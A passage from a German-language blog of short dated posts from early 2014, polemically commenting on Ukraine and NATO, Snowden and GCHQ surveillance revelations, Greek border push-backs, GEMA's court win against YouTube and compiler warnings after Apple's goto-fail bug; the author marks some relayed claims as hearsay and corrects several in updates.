An der Karte fallen auch noch die fetten Vorkommen unter dem Baltikum auf, und die unter Polen. Das waren auch mit die ersten Länder, die sich die Nato gekrallt hat. Freiheit! Demokratie! Menschenrechte!1!!
Der Guardian schreibt:
In a speech at the National Press Club in Washington DC last December as Ukraine's Maidan Square clashes escalated, Nuland confirmed that the US had invested in total "over $5 billion" to "ensure a secure and prosperous and democratic Ukraine" - she specifically congratulated the "Euromaidan" movement.
Nuland war die hier, die mit dem "fuck the EU".

Fri Mar 7 2014

[l] Auf dem 30C3 hatten wir ja diesen Foschepoth-Vortrag über die Geschichte des Abhörens im Nachkriegsdeutschland. Einer der Punkte darin war, dass das deutsche G10-Gesetz explizit so gemacht wurde, wie es ist, weil die Alliierten darauf bestanden haben, und Deutschland eben kein souveräner Staat war.
Edward Snowden hat Fragen des EU-Parlaments beantwortet, und da hat er diesen Punkt auch noch einmal explizit angesprochen.
In einer Antwort auf Fragen des Europaparlaments schreibt Snowden: "Deutschland wurde bedrängt, sein G-10-Gesetz zu ändern, um die NSA zu befriedigen, und hat die verfassungsmäßigen Rechte deutscher Bürger untergraben." Das G-10-Gesetz regelt Eingriffe in die Telekommunikationsfreiheit und das Abhören von Telefonen.
Es erfüllt mich mit großer Freude, dass er das angesprochen hat. Er schreibt auch ausdrücklich, dass dies auf Druck der NSA geschehen ist. Und — der Teil war mir neu — dass es ähnliche Einflussnahme auch in anderen Ländern gab. Er nennt Schweden, die Niederlande und Neuseeland.

Thu Mar 6 2014

[l] Obama legt los mit Sanktionen gegen … naja, eigentlich haben sie niemanden, den sie sanktionieren können. Putin hat ja nichts Verbotenes gemacht, die Krim macht da einen Volksentscheid, das ist zumindest mit dem üblichen Freiheit-Demokratie-Menschenrechte-Gefasel der Amerikaner nicht anzugreifen, also haben sie sich eine unklare Gruppe von Russen und Ukrainern rausgepickt. DIE sind jetzt an allem Schuld!1!! Und die werden jetzt den langen Arm des Gesetzes kennenlernen!1!! Wobei das ja streng genommen kein Gesetz ist und auch kein langer Arm, sondern eher was man von einem Diktator erwarten würde. Man stelle sich mal vor, der Putin würde nach Gusto irgendwelchen Amerikanern oder amerikanischen Firmen ihre Vermögen in Russland einfrieren. Was wir da für ein Geschrei hätten! Aber der Friedensfürst Obama, der darf das.
Bestraft werden sollen jene, die die "Souveränität und territoriale Integrität der Ukraine bedrohen" und "die demokratischen Prozesse und Institutionen des Landes" untergraben
Die Formulierung finde ich echt den Gipfel. Wir haben es hier mit einer Volksabstimmung zu tun auf der Krim. Und trotzdem kommen die mit "die demokratischen Prozesse". Für SO BLÖDE halten die euch!
Man beachte, dass sie explizit davon sprechen, die Sanktionsopfer hätten die Souveränität und territoriale Integrität der Ukraine bedroht. Bedroht, nicht verletzt.
Aber hey, nichts ist so offensichtlich bescheuert, dass die Merkel nicht noch auf den fahrenden Zug aufzuspringen versuchen würde!
Bundeskanzlerin Angela Merkel erklärte, sie halte auch Sanktionen der Europäischen Union gegen Russland für unausweichlich, wenn Moskau nicht zu diplomatischen Gesprächen bereit ist. Man könne nicht einfach zur Tagesordnung übergehen, "wenn noch keinerlei diplomatische Gespräche stattfinden", sagte sie. Die Kanzlerin machte klar: "Das heißt, wir werden uns auch mit Sanktionen beschäftigen in unterschiedlicher Art und Weise."
Das befürworte ich ausdrücklich. Solange die Merkel mit Sanktionen für die Ukraine beschäftigt ist, richtet sie anderswo keinen Schaden an. Natürlich sollten wir jetzt verhindern, dass es tatsächlich zu Sanktionen gegen die Ukraine kommt. Die armen Schweine dort haben schon genug Ärger und brauchen nicht noch einen Knüppel zwischen die Beine. Wieso betone ich so, dass die Sanktionen gegen die Ukraine sind? Schaut euch mal diese Grafik an, wieviel Prozent unseres Erdgases wir von Gazprom kriegen. Und WIR wollen RUSSLAND mit Sanktionen drohen? Dass ich nicht lache!
Update: Im Übrigen sei noch darauf hingewiesen, dass der Westen selbstverständlich Volksabstimmungen zur Abspaltung von Regionen für angemessen hält, wenn das zu erwartende Ergebnis der Abstimmung westliche Interessen widerspiegelt. Oder man kann natürlich auch nach Ex-Jugoslawien gucken, oder zur Aufspaltung der Tschechoslowakei. Was wohl gewesen wäre, wenn da die eine Hälfte gesagt hätte, sie wollen lieber Kommunisten werden?

Tue Mar 4 2014

[l] Wieso haben die ganzen Telcos eigentlich so bereitwillig mitgemacht beim Massenabhören? Hier ist ein Hinweis: "Sprint Accused of Overcharging Feds Millions for Wiretapping"

Sun Mar 2 2014

[l] Jetzt macht die Nato ein Notfall-Meeting zur Ukraine. Und natürlich nutzen die Cowboys von der Nato die Gelegenheit, den Russen eins reinzuhauen. Faseln von territorialer Integrität der Ukraine und rufen die Russen auf, ihr Militär aus der Krim zurückziehen. Ich könnte mich ja immer beömmeln, wenn die Nato was von territorialer Integrität faselt, während die Amerikaner ihre Militärbasen in Deutschland immer noch nicht zugemacht haben. Aber wisst ihr, wer sich an die Verträge gehalten hat und ihre Basen fristgemäß zugemacht hat? Die Russen.
Oder was ist mit der territorialen Integrität von Afghanistan und Pakistan? Hier ist eine Liste von US-Militärbasen. Lasst das mal an euch vorbeiscrollen.
Und "Militär aus der Krim abziehen" ist auch so eine Verarschungs-Forderung. Da liegt die russische Schwarzmeerflotte, und zwar seit dem 18. Jahrhundert. Was für eine bekloppte Forderung! Vor allem möchte ich mal kurz zwei Daten gegenüberhalten. Gründung der russischen Schwarzmeerflotte in Sebastopol: 13. Mai 1783. Anerkennung der Unabhängigkeit der Vereinigten Staaten von Amerika: 3. September 1783. Die Schwarzmeerflotte der Russen hat ältere Rechte als die USA!
Oh und wo wir gerade bei territorialer Integrität waren. Was ist denn mit der territorialen Integrität der Ureinwohner Nordamerikas?
Dass die sich überhaupt trauen, mit so einer Bullshit-Lavine in Richtung Kamera zu gucken!

Thu Feb 27 2014

[l] Kennt ihr die Trendsportart gelangweilter Teenager, nach Webcams zu suchen und sich dann die Streams anzugucken? Ist ja irgendwie offensichtlich, aber wenn das Teenager machen, dann machen das natürlich auch Geheimdienste. Ergebnis:
GCHQ files dating between 2008 and 2010 explicitly state that a surveillance program codenamed Optic Nerve collected still images of Yahoo webcam chats in bulk and saved them to agency databases, regardless of whether individual users were an intelligence target or not.
Nun haben Geheimdienste natürlich weniger Skrupel und fühlen sich weniger an Recht und Gesetz gebunden als gelangweilte Teenager mit Hormonüberschuss, daher haben die Dienste nicht nur offene Webcams abgeschnorchelt sondern alle, an die sie rankamen. Daher ist da ziemlich viel Material zusammengekommen:
In one six-month period in 2008 alone, the agency collected webcam imagery – including substantial quantities of sexually explicit communications – from more than 1.8 million Yahoo user accounts globally.
Sportlich!
Nun ja, werdet ihr euch jetzt denken, die werden mit einer derartigen Datenflut ja wahrscheinlich auch Probleme gehabt haben. Zum Beispiel wie man aus sowas die Bilder von Briten rausfiltert, denn die dürfen sie ja nicht abschnorcheln. Ich muss euch enttäuschen:
GCHQ does not have the technical means to make sure no images of UK or US citizens are collected and stored by the system
Geht nicht. Mehr Gedanken haben sie sich dazu nicht gemacht. Na dann speichern wir halt alle.
Aber das heißt nicht, dass sie nicht trotzdem Probleme hatten. Nein, nicht was ihr denkt. Ihr Problem war, dass ihre "Analysten" die ganze Zeit die Porno-Streams "analysiert" haben, anstatt zu arbeiten.
The documents also chronicle GCHQ's sustained struggle to keep the large store of sexually explicit imagery collected by Optic Nerve away from the eyes of its staff
m(
Ein spannender Effekt ist, dass sie am Ende Gesichtserkennungssoftware installiert haben, damit die "Analysten" nur Streams zu sehen kriegen, auf denen auch ein Gesicht ist. Man kann sich also ungestört per Videochat unterhalten, wenn man den Videostream durch Pornos ersetzt.

Tue Feb 25 2014

[l] Mir hat gerade ein Vögelchen einen Ausschnitt aus der Pressekonferenz mit Merkel und Netanjahu gemailt. Ich kann das nicht prüfen, behandelt es daher als Hörensagen. Hier ist er:
Frage: Sehr geehrter Ministerpräsident, hat Israel heute Nacht wirklich an der syrisch-libanesischen Grenze angegriffen? Wenn ja, warum?
Frau Bundeskanzlerin, Sie sagten, die Siedlungen seien ein Hindernis für den Frieden. Unterstützt denn die Bundesrepublik - - (Abbruch der Übersetzung)
MP Netanjahu: (Anfang der Antwort wurde nicht übersetzt)
Zunächst einmal werde ich nicht darauf eingehen, was wir angeblich getan haben. Das ist das erste bei der Sache.
Der zweite Faktor ist, dass wir alles tun, was notwendig ist, um die Sicherheit der israelischen Bürger zu verteidigen.
Da ist der Zensor ja gerade noch rechtzeitig vom Pinkeln zurückgekommen, um Schlimmeres zu verhindern!
Update: Der Ausschnitt ist jetzt genau so bei bundesregierung.de online (weiter unten, nach Abbruch suchen). Ist also nicht mehr nur Hörensagen.
[l] Die Gema hat es tatsächlich geschafft, das LG München davon zu überzeugen, gegen die Gema-Sperrtafel von Youtube zu urteilen. Die Presseerklärung der Gema behauptet:
Das Landgericht München hat heute ein Urteil im Rechtsstreit der GEMA gegen YouTube um die Verwendung der sogenannten GEMA-Sperrtafeln verkündet. Die Sperrtafeln auf YouTube sind illegale Anschwärzung und Herabwürdigung, so das Landgericht München.
Dabei hat Youtube das schon extra zurückhaltend formuliert, um keine falschen Tatsachenbehauptungen zu tätigen. Was für ein krasses Fehlurteil des LG München. Aber hey, ich bin ja eh der Meinung, dass die Gema schleunigst zugemacht werden müsste. In erster Näherung muss die Gema-Vermutung weg.
Diese Aussage mit herabwürdigen und anschwärzen bringt auch Heise, das scheint also tatsächlich im Urteil zu stehen. WTF?! Wo ist denn da bitte eine Herabwürdigung? Und "anschwärzen" ist meines Wissens kein juristischer Begriff. Ich glaube es hakt!?
Ich hoffe mal, Google lässt das nicht auf sich beruhen. Immer feste druff. Na los, Google, greift mal kurz in die Sofaritze.

Mon Feb 24 2014

[l] Die Amerikaner haben in New Mexico ein Atommüllendlager im Salzstock. Habe ich vorher noch nie was von gehört. Das liegt daran, dass sie es nicht Atommüllendlager nennen, sondern "Waste Isolation Pilot Plant". Da gab es kürzlich einen kleinen Störfall. Nichts großes, da muss man sich keine Sorgen machen, da sind nur ein paar Radioaktivitätsmelder angesprungen. Da haben sie dann das Personal abgezogen und als Vorsichtsmaßnahme die Filter angeschaltet. Es besteht keine Gefahr für die Anwohner, wir haben alles im Griff.
Officials at the site discounted any effect on human health, saying no radiation escaped to the surface. But they said little about the extent of the problem or how it could be cleaned up.
Der Atommüll dort kommt übrigens von den Atombombenbauern und ihren Zulieferern, nicht von zivilen Installationen. Dementsprechend ist WIPP für Transurane wie Plutonium zuständig. Das wäre schon unangenehm, wenn da Plutonium ausgetreten wäre.
In dem Zusammenhang liest sich diese Meldung ein bisschen gruselig:
Results indicate slightly elevated levels of airborne radioactive concentrations, which are consistent with the waste disposed of at WIPP.
Update: Frank meint, ich soll deutlicher machen, dass ich mich wundere, dass die Luftfilter nicht die ganze Zeit laufen sondern erst bei Unfällen angemacht werden.
[l] Habt ihr mitgekriegt, dass die Briten ein Flutproblem hatten in den letzten Wochen? Denen schwamm da die Infrastruktur weg. Die Briten haben in Sachen Katastrophenschutz so gefühlt gar nichts am Start. Ich hab das mal erlebt, als ich für einen Auftrag im Februar da war, und eine dünne Schneedecke fiel. Das war nicht mal ein Zentimeter. Die Infrastruktur brach weiträumig zusammen. Leute gingen nicht zur Arbeit, weil es zu gefährlich war, die Wohnung zu verlassen.
Also, die Flut war ein größeres Problem für das Land. Was tut man da? Man wendet sich an seine Nachbarn. Die Holländer kennen sich aus mit Fluten und Wassermassen und Pumpen. Also haben die Briten bei den Holländern einmal Pumpen geordert, und zwar das Rechts-Unten-Modell, die Enterprise-Ausführung.
Ergebnis: Der Wasserdruck der Pumpen hat ihnen das Flussbett weggespült, also haben sie sie lieber wieder ausgemacht :-) (Danke, Vincent)
[l] Bei diesem Apple-Bug hat sich vielleicht der eine oder andere gefragt, wieso da eigentlich nicht der Compiler gemeckert hat. Unreachable Code ist eigentlich eine der einfacheren nützlichen Warnungen, die man so raushauen kann als Compiler. gcc hat das auch immer getan, man musste nur den Optimizer mit anwerfen, weil die Information, welcher Code reachable ist, erst aus den Optimizer-Passes rausfällt. Aber hey, kann man ja mit leben, mit der Einschränkung.
Nun benutzt Apple aber nicht gcc sondern clang. Und da gibt es die Warnung zwar, aber sie muss manuell angeschaltet werden und ist nicht Teil von -W -Wall -Wextra. Das ist meiner Ansicht nach ein grober Fehler, den clang korrigieren sollte.
Aber wie ist denn das bei gcc? Wäre Apple sicher gewesen, wenn sie gcc eingesetzt hätten?
Wie sich rausstellt: Nein. gcc hat die Option vor ein paar Jahren deaktiviert. Ja, ganz weg. Die Kommandozeilen-Option gibt es noch, aber sie tut nichts mehr. Was für ein epischer Knieschuss, liebe gcc-Maintainer! Da habt ihr ja mal wieder mit Anlauf einen Kopfsprung ins Klo gemacht!
Man kann also im Moment Softwareentwicklern unter Linux nur empfehlen, clang mindestens als Zweitcompiler zu verwenden, um diese Warnung überhaupt kriegen zu können. Oder man steigt gleich ganz auf clang um, weil man keinen Bock mehr auf die Andrew Pinskis bei gcc hat.
Ich bleibe erstmal noch bei gcc, weil da immer noch geringfügig besserer Code rausfällt in meinen Tests.

Sat Feb 22 2014

[l] Gute Nachrichten aus den USA: Krise? Welche Krise! Austerity ist vorbei! Obama findet, wir geben jetzt einfach mehr Geld aus. Damit ist dann wahrscheinlich auch in der EU Schluss mit Austerity, denn wir müssen ja den Euro ungefähr in einer Liga wie den dann abstürzenden Dollar halten. Letztes Mal haben wir einen fetten Banken-Bailout gemacht, um Geld verschwinden zu lassen. Mal gucken, was wir dieses Mal machen. Vielleicht einen Bailout für Italien und Griechenland?
Das wäre keine Sekunde zu früh, denn Griechenland spart jetzt schon an Krankenhäusern und Malariaprävention. Das gesamte Konzept von "wir nehmen Griechenland in die EU auf" war ja, dass wir die Landgrenze verkleinern wollten, die Frontex beschützen muss. Da war uns dann auch wurscht, dass Griechenland seine Bücher frisieren musste, um die Aufnahmekriterien zu erfüllen. Wenn das rauskommt, wäre ja klar, wem die "Bild"-Zeitung die Schuld gibt — den Griechen, nicht uns. Das ist jetzt halt eine Seegrenze, da ist die Abwehr weniger aufwendig. Wenn Griechenland weiter so herunterkommt, dann werden wir statt Afrikanern Griechen als Flüchtlinge haben in Europa.
Meine Vermutung ist daher: Demnächst gibt es eine Rettung für Griechenland in Höhe von mindestens zweistellig Milliarden, eher dreistellig. Oder vielleicht findet ja auch Italiens neue Regierung ein paar Berlusconi-Fukushimas, die von der EU solidarisch gestopft werden müssen. Das finanzielle Tschernobyl wird in einen Sarkopharg aus Euronoten gepackt oder so. Das ließe sich auch verkaufen.
Es bleibt spannend!
Update: Der erste Schritt von sowas ist ja imme eine Häufung an Katatstrophen-Meldungen, damit das Volk nach einer Politikänderung ruft und die Politik sich dann "überreden" lassen kann. Hier ist noch eine aus Griechenland: Säuglingssterblichkeit um 43% gestiegen.
Update: Ich habe eine Mail zur Säuglingssterblichkeit gekriegt, da hat jemand die Zahlen rückverfolgt. Ergebnis:
2004 4.06
2005 3.8
2006 3.69
2007 3.55
2008 2.65
2009 3.15
2010 3.8
2011 3.35
Um da auf 43% zu kommen, muss man 2008 mit 2010 vergleichen und sowohl 2007 als auch 2011 ignorieren.
Update: Ich klär mal auf, falls es jemand nicht gemerkt hat: Griechenland musste für die Euroaufnahme bescheißen, nicht für die EU-Aufnahme. Frontex gab es damals noch nicht. Und Griechenlands nördliche Anrainer waren auch nicht in der EU, insofern hat die Aufnahme Griechenlands auch die Landgrenze nicht verkleinert. Ich hoffe, ihr habt das alle gemerkt und glaubt mir solche Stammtischparolen in Zukunft nicht einfach unbesehen.

Fri Feb 21 2014

[l] Das Weiße Haus legt eine Crowdsourcing-Initiative auf, um Prior Art für Patente zu finden. Nein, wirklich! Crowdsourcing! Nein, ich scherze nicht! Die wollen wirklich die Gesellschaft per Crowdsourcing dafür zahlen lassen, dass Arbeit gemacht wird, die das Patentamt auf Kosten des Antragstellers hätte machen sollen. Das soll jetzt per Crowdsourcing reinkommen. Was für eine bodenlose Frechheit.
The White House also announced it would launch a new crowdsourcing initiative focused on identifying prior art, evidence of existing inventions that the USPTO can use to reject bad patent claims.
Das Patentamt ist nämlich ein Profit Center. Die machen die Arbeit absichtlich nicht, denn wenn sie ein Patent ungeprüft durchwinken, können sie Gebühren kassieren, und wenn dann ein Patent angefochten wird, dann können sie nochmal Gebühren kassieren. Warum sollten die also am Anfang prüfen.
Wenn ihr mich fragt hat sich die Patentidee überlebt. Ich bin für die Abschaffung der Patentämter, und zwar nicht nur für Softwarepatente. Wenn eine Erfindung so wenig Schöpfungshöhe hat, dass sie innerhalb von Wochen nachgebaut werden kann, dann hatte sie auch keinen Patentschutz verdient.

Thu Feb 20 2014

[l] Zu dem Whatsapp-Deal kommt hier gerade eine Mail rein, die ich mal fast komplett zitieren möchte:
Warum nur hat noch kein Qualitätsjournalist den Zusammenhang analysiert, das sowohl Facebook als auch WhatsApp beide von SEQUOIA Capital finanziert werden?!
Einfacher lassen sich 16 Milliarden Dollar doch gar nicht aus einem Börsenunternehmen rauswuchten, ohne dass der Kurs zusammenklappt!
Das Ganze ist kein Gewinn für WhatsApp, sondern eine Geldentnahme aus Facebook.
Vermutlich wird im kleinen Kreise bei einem leckeren WhatsApp BBQ Kassensturz gemacht während sich die Anleger mit den Analysen der Technologiejournalisten trösten, die sich haarsträubend absurde Begründungen aus den Fingern schreiben, warum ein $16,000,000,000 Klitschenkauf gerechtfertigt sein könnte.
Beim YouTube Merger war es das gleiche Spiel. Wieder Sequoia Capital auf beiden Seiten.
Klingt plausibel, wenn ihr mich fragt.
Update: Oh und wisst ihr, wer noch von Sequoia finanziert wurde? Instagram. Für die hatte Facebook ne Milliarde hingelegt. Das war dann wahrscheinlich Warmlaufen.
Update: Schöne Geschichte, bis auf das Detail, dass Facebook offenbar keine Kohle von Sequoia genommen hat. Die sind fast die einzigen, die da nicht investiert haben. (Danke, Gunnar)
[l] Der nigerianische Staatsbankchef ist wegen "financial recklessness and misconduct" gefeuert worden. Und zwar ist der Mann da der einzige Korruptionsbekämpfer auf weiter Flur, der tatsächlich gelegentlich Korruption bekämpft. Der hat kürzlich darauf aufmerksam gemacht, dass von den 67 Milliarden Dollar Einnahmen der staatlichen Ölfirma 20 Milliarden nicht auffindbar sind. Und das geht ja wirklich nicht, dass jemand die Geldquelle des Präsidenten und seiner Amigos versiegen lässt!

Wed Feb 19 2014

[l] Die Bundesbank findet, das mit dem Goldrücktransport alles total super läuft. Ihr erinnert euch vielleicht, wir hatten das beim Fnord-Jahresrückblick. Bis 2020 sollen wir rund 300 Tonnen Gold zurückgeholt haben.
Thiele versicherte nun auf Nachfrage der Zeitung, dass es beim Transport des Goldschatzes nach Deutschland keine Startschwierigkeiten gegeben habe.
Außer des hohen logistischen Aufwands, der die initiale Liefermenge so klein hielt.
Die Zusammenarbeit mit der US-Notenbank beim Transport der Goldbarren bezeichnete Thiele als "in jeder Hinsicht konstruktiv". "Die Amerikaner haben nie gemauert oder gebremst"
Äh, nicht? Wieso dann nur 300 Tonnen bis 2020 und nicht alle 1536 Tonnen jetzt auf einen Schlag?

Tue Feb 18 2014

[l] The Intercept (Greenwalds neue Site) hat Daten dazu, wie Five Eyes gegen Wikileaks, Piratebay und Anonymous vorgegangen sind. Betrachtet euch mal selbst bei der Enthüllung, dass die in Echtzeit die IPs der Zugriffe mitgeloggt haben. Das schockiert doch niemanden mehr wirklich. In so einer Welt leben wir heute! SO VIEL Zivilisation haben die schon kaputtgemacht!
Oh und: Sie haben Open Source Software verwendet. Es wird WIRKLICH Zeit, dass wir alle auf eine Lizenz umschwenken, die solche Verwendung unserer Arbeit verbietet.
In dem Artikel geht es auch darum, wie die USA Druck auf andere Länder ausgeübt haben, um Assange anzuklagen. Eine Formulierung dabei finde ich besonders krass:
The document details, on a country-by-country basis, efforts by the U.S. government and its allies to locate, prosecute, capture or kill alleged terrorists, drug traffickers, Palestinian leaders and others.
DAS sind die Kategorien, in denen die denken? Terroristen, Drogenschmuggler, Palästinenserführer und andere?!

Mon Feb 17 2014

[l] Es gibt da so eine Anekdote aus dem kalten Krieg. Die ostdeutschen Kasernen hatten immer Dienst am Wochenende, denn der Klassenfeind könnte ja angreifen. Die westdeutschen Kasernen haben am Freitag um 1 Feierabend gemacht und dann war Wochenende. Die ostdeutsche Führung wusste das, aber wollte die Soldaten nicht verweichlichen lassen.
Daran musste ich denken, als ich die folgende Geschichte las. Es ging mit dieser Meldung los, dass ein Flugzeug von Ethiopian Airlines in Genf notlandete, und der Copilot dann erstmal in der Schweiz Asyl beantragt hat. Der hat offensichtlich das Memo nicht gekriegt neulich.
Anders kommt man ja in diese Scheiß EU auch nicht mehr rein, mit Frontex und so weiter. Da muss man schon direkt in der EU landen. Die Grenzländer schmeißen schnell wieder raus (die werden nach Fallzahlen Budget kriegen, d.h. die freuen sich wahrscheinlich über jeden, den sie rauskanten können). Die Innenländer geben kein Asyl, wenn man aus einem sicheren Drittland kam, also aus einem der Grenzländer der EU z.B. Da muss man ja quasi mit einem Flugzeug in der Mitte der EU landen!
Aber das ist noch nicht der Kracher an der Story. Der Kracher ist, dass die Schweizer Luftwaffe nichts unternehmen konnte, weil sie nur zu Bürozeiten einsatzbereit sind. Daraufhin sprangen zwei französische Mirage ein.
Der beste Zeitpunkt für einen Angriff auf Deutschland ist ja traditionell zur Fastnachtzeit :-)
Update: Der Grund, wieso der nach Genf umleitete: Italien hat ein Rückflugabkommen mit Ätiopien, die Schweiz nicht.

Thu Feb 13 2014

[l] Kurzer Kommentar am Rande.
Habt ihr mal einen Physiker gefragt, welchen Erkenntnisgewinn die Physik eigentlich bietet?
Macht das mal! Der Physiker kriegt dann leuchtende Augen und ihr eine lange Liste. Mondlandung, Teilchenbeschleuniger, Hubble, ISS, Solarzellen, Materialforschung, einen Autounfall überleben können, Kraft-Wärme-Kopplung, …
Fragt mal einen Mathematiker. Eine meiner Lieblingsfragen an Wissenschaftler ist ja nicht nach dem Erkenntnisgewinn, sondern warum ihre Disziplin schön ist.
Aber als ich vorhin fragte, welchen Erkenntnisgewinn Gender Studies bietet, kamen bis auf eine Ausnahme nur Beleidigungen und Anfeindungen rein.
Ist Gender Studies so ein tristes Fach? Gibt es da nicht eine positive Sache, die man mal nennen könnte?
Mein persönlicher Eindruck ist, dass Gender Studies im Kern keine Wissenschaft ist, weil Kernthesen wie "Geschlechtsidentität ist kulturell und nicht biologisch" nicht falsifizierbar sind. Aber das schrieb ich vorhin nicht. Ich schrieb eigentlich überhaupt nichts Negatives über Gender Studies. Aber die Teilmenge meiner Leser, die sich zu einer Antwort durchrangen, haben das alle nicht bemerkt. Ist Leseschwäche besonders verbreitet unter Gender Studies-Anhängern oder ist mein Sample Size zu klein?
Update: Das gleiche wie für Physik und Mathematik gilt natürlich auch für Disziplinen wie Geschichte und Politologie. In eigentlich jedem Fach haben sich ihre Studenten Gründe zurechtgelegt, wieso sie das studieren. Gute, positive Gründe.
Update: Mir hat jemand diesen Link gemailt. Den lass ich hier mal so stehen *hust* :-)
Update: Weil das einige Leser missverstanden haben: mit "nicht falsifizierbar" meinte ich in diesem Fall nicht, dass die These so formuliert ist, dass sie nicht widerlegbar wäre, sondern dass es Beweise gibt, die die These widerlegen, aber die These trotzdem weiter als wahr verbreitet wird. Mit anderen Worten: es ist egal, was in der Realität passiert, die These ist nicht widerlegbar. Daher ist bei wissenschaftlichen Experimenten auch immer die dritte Frage (nach These und Versuchsaufbau), bei welchem Ergebnis die These als widerlegt gilt. Wenn jemand im Nachhinein dann herumzuwieseln und Ergebnisse wegzudiskutieren oder zu leugnen versucht, ist es keine Wissenschaft.
[l] Der griechische Grenzschutz soll ein Boot mit Flüchtlingen zurück auf die hohe See gezogen und ihnen dann beim Absaufen zugeguckt haben. Das sagen Familienangehörige der Ertrunkenen.
Die Überlebenden werfen den Griechen vor, sie aufs Meer hinausgeschleppt zu haben. Das Boot sei vollgelaufen, sie hätten um Hilfe gerufen und den Küstenwächtern ihre Kinder entgegengestreckt. Wenigstens die sollten überleben. Doch anstatt zu helfen, habe die Küstenwache das Abschleppseil gekappt
Und DIESE EU wagt es, der Schweiz gegenüber das Wort "Ausländerfeindlichkeit" in den Mund zu nehmen!
Aber hey, vielleicht ist das ja nur ein Einzelfall, denkt ihr euch jetzt. Vielleicht lügen die Angehörigen! Stressige Situation und so weiter, da entgleitet einem schonmal die Realität? Guckt mal:
Push-back - so nennen es die Experten, wenn Grenzschützer […] beispielsweise Flüchtlingsboote aus griechischen Gewässern einfach wieder aufs Meer hinausschleppen
Es gibt da einen Fachbegriff für!
Dutzende solche Fälle haben Amnesty International und Pro Asyl im vergangenen Jahr dokumentiert.
Natürlich ist das illegal, das hat der Europäische Gerichtshof für Menschenrechte sogar explizit geurteilt — als wenn man für diese Einschätzung ein Gericht anrufen müsste!
Immer noch Zweifel? Sogar der Frontex-Chef gibt zu, dass das gemacht wird!
Dass es die Praxis gibt, räumte sogar Frontex-Chef Ilkka Laitinen vor nicht allzu langer Zeit ein. "Ich kann nicht bestreiten, dass es diese Fälle gegeben hat"
(Danke, Stefan)

Wed Feb 12 2014

[l] Nochmal zu Edathy. Ich habe da ein paar Sachen gemailt gekriegt, die ich hier mal ungeprüft und unhinterfragt wiedergebe.
Die ganze Chose basiert auf einer Kundenliste, die in Kanada anfiel, als sie einen "Kinderpornoring zerschlagen" haben, wie die Presse berichtete. Tatsächlich war das aber kein Kinderpornoring sondern ein Versender von (nichtsexuellen) Nudistenfotos. Mag man anstößig finden, aber verboten ist es weder in Kanada noch hier. Der Laden hatte ein ganz normales Gewerbe angemeldet und hat auch brav Steuern gezahlt und sich sogar mit anderen Firmen gerichtlich über Trademarks gezankt. Wieso gab es dann überhaupt eine "Kinderpornoring-Hopsnahme"? Weil ein Kunde (EINER!) von dem Laden einen großen Stash an Kinderpornos hatte, und da haben sie sich gesagt, hey, der hat da legale Dinge gekauft, vielleicht sind noch andere von deren Kunden in Kinderpornokram verwickelt. Und seit dem gibt es anscheinend in diversen Ländern Hausdurchsuchungen bei Kunden von dieser Firma. Und zwar nur weil die legale Bilder bei einer Firma im Ausland geordert haben.
Nun bin ich kein Experte dafür, was für Bilder legal sind und welche nicht, und wo man was ordern kann. Aber wenn das stimmt, dann erscheint es mir geradezu grotesk, dass sie da wild bei Leuten Hausdurchsuchungen machen.
Im Lawblog steht derweil Ähnliches, mit Verweis auf die Süddeutsche Zeitung.
Ich denke mal, wenn das wirklich so gelaufen ist, wird der Edathy der Staatsanwaltschaft ein paar neue Körperöffnungen reißen. Sowas kann man vielleicht mit ein paar Hartz IV-Opfern machen, aber im Bundestag sitzen fast nur Lehrer und Juristen. Der Edathy ist wahrscheinlich mit mehr Juristen per Du als der zuständige Staatsanwalt.
Seine politische Karriere ist aber denke ich mal trotzdem vorbei. Auch wenn die Aufnahme nicht strafrechtlich relevant sind.
[l] Der Lacher des Tages wird euch im Halse steckenbleiben. Netzpolitik.org hat sich mal den Spaß gemacht, die diversen Landtage anzuschreiben. Sie wollten wissen, wie man eigentlich mit denen verschlüsselt kommunizieren kann. Und ob die interne Richtlinien haben, wann was verschlüsselt werden muss.
Die Antwort ist mit "Äh… Ägypten?" wohlmeinend zusammenfassbar. Money Quote:
Aber noch trauriger als Nicht-Antworten waren die, bei denen klar wurde, dass meine Frage nichteinmal verstanden wurde. “Wir geben über unsere technische Ausstattung keine Auskünfte” (CDU Berlin), “Zu Sicherheitsaspekten des Hessischen Landtages können wir leider grundsätzlich keine Auskünfte geben”, ”Wir geben grundsätzlich keinerlei Auskunft zu unserer elektronischen Kommunikation” (FDP Sachsen) und ähnlich lauteten Aussagen von besorgten Stellen, die wohl zu glauben schienen, sie gäben wertvolles Geheimwissen preis, wenn sie ihre öffentlichen Schlüssel ausplaudern… Aber man darf vermuten, dass die eigentliche Sicherheitsinfo diejenige ist, dass es überhaupt keine Sicherheit gibt.
Seufz.

Wed Feb 5 2014

[l] In diesem ganze Virtualisierungs-Rummel ist ja die Grenze zwischen Satire und realem Produkt eh schon immer recht unscharf. Ich ignoriere das an sich seit ein paar Jahren erfolgreich alles weg, aber heute hab ich mal wieder ein bisschen herumgeklickt. Und finde dabei HyTrust und PrivateCore. HyTrust fällt es ein bisschen schwer zu formulieren, was ihr Produkt eigentlich genau tut. Aber es unterstützt Active Directory und hat was mit der Cloud zu tun, und sie haben total viele bunte Awards gewonnen!1!! Die beiden Firmengründer haben vorher "disaster recovery for Microsoft Exchange" gemacht.
Und PrivateCore macht … RAM-Verschlüsselung. Nein, wirklich!
vCage validates the integrity of the hardware environment
Gemeint ist hier Trusted Computing, TPM-Measuring.
provides a hardened hypervisor based on KVM
Hardened und "based on KVM" in einem Satz? Oioioio!
and secures server random access memory (RAM) with AES encryption.
Wie soll das funktionieren? Na ganz einfach!
This is done by loading a secure hypervisor into CPU cache and acting as a gateway to encrypt memory paging in and out between the CPU cache and RAM.
Soso, paging! Zwischen CPU-Cache und RAM, ja? Paging?
Ob deren Produktbeschreibung aus irgendeinem Nonsens-Paper-Generator rausgefallen ist?
Das wäre ja alles höchst unterhaltsam, wenn nicht die Marketing-Ansage wäre: Wenn ihr das macht, müsst ihr dem Cloud-Provider nicht mehr vertrauen! Eure Anwendung kann dann vertrauenswürdig laufen, auch wenn die Hardware, auf der sie läuft, nicht vertrauenswürdig ist! Überhaupt hat Intel eine Technologie namens TXT im Angebot, von der sie versprechen, dass man damit TPM-Attestation bis hinein in die Anwendung haben kann, die in der VM läuft.
